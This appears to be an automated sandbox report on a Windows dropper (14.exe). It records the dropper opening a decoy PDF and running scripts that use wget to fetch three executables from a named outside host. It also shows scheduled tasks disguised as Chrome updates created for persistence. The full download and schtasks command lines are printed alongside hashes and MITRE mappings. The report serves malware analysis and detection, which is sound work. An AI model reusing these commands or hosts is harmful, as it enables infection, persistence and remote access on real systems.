9f651ae6ea538238748614a7f86fe2b0f76e881d6c38da581f284e4b6f79b0ca

Analysis

max time kernel
158s
max time network
117s
platform
windows7_x64
resource
win7-en-20211208
submitted
28-01-2022 13:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

01/2015.5.27/14.exe
Size

821KB
MD5

9ed9cb3fdd2a68a25665681a94879771
SHA1

ad957a4aca28e4ab343cd8151e9e218b39e3f595
SHA256

05a5bad78cdb97a78ca13bf4afa525a5294dbc9e6babb41a0861d48e76d64bcb
SHA512

15941df8d2dfb085e7604c3e94d4346cb59e240700dd06ceabe28d57cd471dc50ccb7448d5b9a3ac6b2642a3a09367d14819214c915ce4c069a476c43b7da223

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 4 IoCs

Processes:

getcrome.exewget.exewget.exewget.exe

pid process

1984 getcrome.exe
1528 wget.exe
1716 wget.exe
1604 wget.exe

pid	process
1984	getcrome.exe
1528	wget.exe
1716	wget.exe
1604	wget.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\wget.exe	upx
C:\Users\Admin\AppData\Local\Temp\wget.exe	upx
\Users\Admin\AppData\Local\Temp\wget.exe	upx
C:\Users\Admin\AppData\Local\Temp\wget.exe	upx
\Users\Admin\AppData\Local\Temp\wget.exe	upx
C:\Users\Admin\AppData\Local\Temp\wget.exe	upx
\Users\Admin\AppData\Local\Temp\wget.exe	upx
\Users\Admin\AppData\Local\Temp\wget.exe	upx
C:\Users\Admin\AppData\Local\Temp\wget.exe	upx
\Users\Admin\AppData\Local\Temp\wget.exe	upx

Loads dropped DLL 9 IoCs

Processes:

14.execmd.exe

pid process

1608 14.exe
1608 14.exe
1608 14.exe
1216 cmd.exe
1216 cmd.exe
1216 cmd.exe
1216 cmd.exe
1216 cmd.exe
1216 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

576 schtasks.exe
1692 schtasks.exe
1972 schtasks.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1956 PING.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

wget.exewget.exewget.exe

pid process

1528 wget.exe
1716 wget.exe
1604 wget.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

1540 AcroRd32.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

AcroRd32.exe

pid process

1540 AcroRd32.exe
1540 AcroRd32.exe
1540 AcroRd32.exe

pid	process
1608	14.exe
1608	14.exe
1608	14.exe
1216	cmd.exe
1216	cmd.exe
1216	cmd.exe
1216	cmd.exe
1216	cmd.exe
1216	cmd.exe

pid	process
576	schtasks.exe
1692	schtasks.exe
1972	schtasks.exe

pid	process
1956	PING.EXE

pid	process
1528	wget.exe
1716	wget.exe
1604	wget.exe

pid	process
1540	AcroRd32.exe

pid	process
1540	AcroRd32.exe
1540	AcroRd32.exe
1540	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

14.exegetcrome.exeWScript.execmd.exe

description	pid	process	target process
PID 1608 wrote to memory of 1540	1608	14.exe	AcroRd32.exe
PID 1608 wrote to memory of 1540	1608	14.exe	AcroRd32.exe
PID 1608 wrote to memory of 1540	1608	14.exe	AcroRd32.exe
PID 1608 wrote to memory of 1540	1608	14.exe	AcroRd32.exe
PID 1608 wrote to memory of 1540	1608	14.exe	AcroRd32.exe
PID 1608 wrote to memory of 1540	1608	14.exe	AcroRd32.exe
PID 1608 wrote to memory of 1540	1608	14.exe	AcroRd32.exe
PID 1608 wrote to memory of 1984	1608	14.exe	getcrome.exe
PID 1608 wrote to memory of 1984	1608	14.exe	getcrome.exe
PID 1608 wrote to memory of 1984	1608	14.exe	getcrome.exe
PID 1608 wrote to memory of 1984	1608	14.exe	getcrome.exe
PID 1608 wrote to memory of 1984	1608	14.exe	getcrome.exe
PID 1608 wrote to memory of 1984	1608	14.exe	getcrome.exe
PID 1608 wrote to memory of 1984	1608	14.exe	getcrome.exe
PID 1984 wrote to memory of 1628	1984	getcrome.exe	WScript.exe
PID 1984 wrote to memory of 1628	1984	getcrome.exe	WScript.exe
PID 1984 wrote to memory of 1628	1984	getcrome.exe	WScript.exe
PID 1984 wrote to memory of 1628	1984	getcrome.exe	WScript.exe
PID 1984 wrote to memory of 1628	1984	getcrome.exe	WScript.exe
PID 1984 wrote to memory of 1628	1984	getcrome.exe	WScript.exe
PID 1984 wrote to memory of 1628	1984	getcrome.exe	WScript.exe
PID 1628 wrote to memory of 1216	1628	WScript.exe	cmd.exe
PID 1628 wrote to memory of 1216	1628	WScript.exe	cmd.exe
PID 1628 wrote to memory of 1216	1628	WScript.exe	cmd.exe
PID 1628 wrote to memory of 1216	1628	WScript.exe	cmd.exe
PID 1628 wrote to memory of 1216	1628	WScript.exe	cmd.exe
PID 1628 wrote to memory of 1216	1628	WScript.exe	cmd.exe
PID 1628 wrote to memory of 1216	1628	WScript.exe	cmd.exe
PID 1216 wrote to memory of 1632	1216	cmd.exe	chcp.com
PID 1216 wrote to memory of 1632	1216	cmd.exe	chcp.com
PID 1216 wrote to memory of 1632	1216	cmd.exe	chcp.com
PID 1216 wrote to memory of 1632	1216	cmd.exe	chcp.com
PID 1216 wrote to memory of 1632	1216	cmd.exe	chcp.com
PID 1216 wrote to memory of 1632	1216	cmd.exe	chcp.com
PID 1216 wrote to memory of 1632	1216	cmd.exe	chcp.com
PID 1216 wrote to memory of 1528	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1528	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1528	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1528	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1528	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1528	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1528	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1716	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1716	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1716	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1716	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1716	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1716	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1716	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1604	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1604	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1604	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1604	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1604	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1604	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 1604	1216	cmd.exe	wget.exe
PID 1216 wrote to memory of 268	1216	cmd.exe	cmd.exe
PID 1216 wrote to memory of 268	1216	cmd.exe	cmd.exe
PID 1216 wrote to memory of 268	1216	cmd.exe	cmd.exe
PID 1216 wrote to memory of 268	1216	cmd.exe	cmd.exe
PID 1216 wrote to memory of 268	1216	cmd.exe	cmd.exe
PID 1216 wrote to memory of 268	1216	cmd.exe	cmd.exe
PID 1216 wrote to memory of 268	1216	cmd.exe	cmd.exe
PID 1216 wrote to memory of 1120	1216	cmd.exe	find.exe

C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\14.exe
"C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\14.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1608

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\spisok.pdf"
2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1540

C:\Users\Admin\AppData\Local\Temp\getcrome.exe
"C:\Users\Admin\AppData\Local\Temp\getcrome.exe" -p000_
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getchrome.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c getchrome.cmd
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1216

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:1632

C:\Users\Admin\AppData\Local\Temp\wget.exe
wget.exe http://xiaomi-mi.com.ua/images/logo/chrome-xvnc-v5517.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1528

C:\Users\Admin\AppData\Local\Temp\wget.exe
wget.exe http://xiaomi-mi.com.ua/images/logo/chromeupdates.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1716

C:\Users\Admin\AppData\Local\Temp\wget.exe
wget.exe http://xiaomi-mi.com.ua/images/logo/updatesexplorer.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ver "
5⤵
PID:268

C:\Windows\SysWOW64\find.exe
find "Microsoft Windows XP"
5⤵
PID:1120

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn ChromeUpdates_vnc /f
5⤵
PID:1224

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /tn ChromeUpdates_vnc /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\chrome-xvnc-v5517.exe /SC MINUTE /mo 240
5⤵
- Creates scheduled task(s)
PID:576

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn ChromeUpdates_ups /f
5⤵
PID:1748

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /tn ChromeUpdates_ups /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\chromeupdates.exe /SC MINUTE /mo 60
5⤵
- Creates scheduled task(s)
PID:1692

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn ChromeUpdates_exp /f
5⤵
PID:616

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /tn ChromeUpdates_exp /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\updatesexplorer.exe /SC MINUTE /mo 10
5⤵
- Creates scheduled task(s)
PID:1972

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:1956

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\getchrome.cmd
MD5
93c67990434454377a2eb13bcafd9a3e

SHA1
2d17bf5310bf73c7a7375c90877f5def35839fb6

SHA256
87ae0c2981e35ba3fc0a00e9c6bf8cc57135c99dae06228212349859b0e82912

SHA512
b3a3bd331827d1b0f0a1fc4619a935107405f0aad47e336d176d24f5245874ae7bd6f2d53555e9558a89f17e6223c59f0b4a0068476d39d30eccedffa52142cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\getchrome.vbs
MD5
97d6fbd4523605f4d2fd15c1a77d08d5

SHA1
968e82657e1f72a4b8b357600e9f4e0d4270be06

SHA256
a59e6b709804144908e1be82293d9565a08a035502cfbc84048d1e248c1e9a3d

SHA512
16468adb77a98bf6c14596e3570661254e568c4586bb0058ac51f7fffb5f75ab28eb50e54e1473b8e616d6f4e50015765a780b6a95a2d00c800be81e46a339e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\getcrome.exe
MD5
90f8f8ea411d767d833f9697dd0dabf4

SHA1
07b81a40c08989a06dff1c0ac4f1b295b7ae5fce

SHA256
c342321da3cb45344153dea18059ab9d90e281e4ac47ac49e39dc7fb1977b6df

SHA512
ece4799c6cf188a293dd53df82c65d3447b9c7e441a89d2a4afbb59dc2f55ba141cfe03f70fce607696235464b161ab09cead75c956aa543e8165036ebe477f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\getcrome.exe
MD5
90f8f8ea411d767d833f9697dd0dabf4

SHA1
07b81a40c08989a06dff1c0ac4f1b295b7ae5fce

SHA256
c342321da3cb45344153dea18059ab9d90e281e4ac47ac49e39dc7fb1977b6df

SHA512
ece4799c6cf188a293dd53df82c65d3447b9c7e441a89d2a4afbb59dc2f55ba141cfe03f70fce607696235464b161ab09cead75c956aa543e8165036ebe477f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\spisok.pdf
MD5
9a089260643dbb76ef4a0b26aa609362

SHA1
d2f74a2ce15993b37e6f9c8a827d5dc9f3e0ddfb

SHA256
3c26b7b0ca159004a80183083f778a4ddd52a8e985b9f6a38998a9bda45c4412

SHA512
a78f42e2a70178c8361b6e8c25e5844d350df0e8f7ba734e4f113c6934952eb49f340af62baa4356a0de5a8780313110f94009723837102b5ad9004c06a69628

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\getcrome.exe
MD5
90f8f8ea411d767d833f9697dd0dabf4

SHA1
07b81a40c08989a06dff1c0ac4f1b295b7ae5fce

SHA256
c342321da3cb45344153dea18059ab9d90e281e4ac47ac49e39dc7fb1977b6df

SHA512
ece4799c6cf188a293dd53df82c65d3447b9c7e441a89d2a4afbb59dc2f55ba141cfe03f70fce607696235464b161ab09cead75c956aa543e8165036ebe477f6

Download Submit
\Users\Admin\AppData\Local\Temp\getcrome.exe
MD5
90f8f8ea411d767d833f9697dd0dabf4

SHA1
07b81a40c08989a06dff1c0ac4f1b295b7ae5fce

SHA256
c342321da3cb45344153dea18059ab9d90e281e4ac47ac49e39dc7fb1977b6df

SHA512
ece4799c6cf188a293dd53df82c65d3447b9c7e441a89d2a4afbb59dc2f55ba141cfe03f70fce607696235464b161ab09cead75c956aa543e8165036ebe477f6

Download Submit
\Users\Admin\AppData\Local\Temp\getcrome.exe
MD5
90f8f8ea411d767d833f9697dd0dabf4

SHA1
07b81a40c08989a06dff1c0ac4f1b295b7ae5fce

SHA256
c342321da3cb45344153dea18059ab9d90e281e4ac47ac49e39dc7fb1977b6df

SHA512
ece4799c6cf188a293dd53df82c65d3447b9c7e441a89d2a4afbb59dc2f55ba141cfe03f70fce607696235464b161ab09cead75c956aa543e8165036ebe477f6

Download Submit
\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
memory/1608-54-0x0000000075D61000-0x0000000075D63000-memory.dmp

Filesize
8KB

Download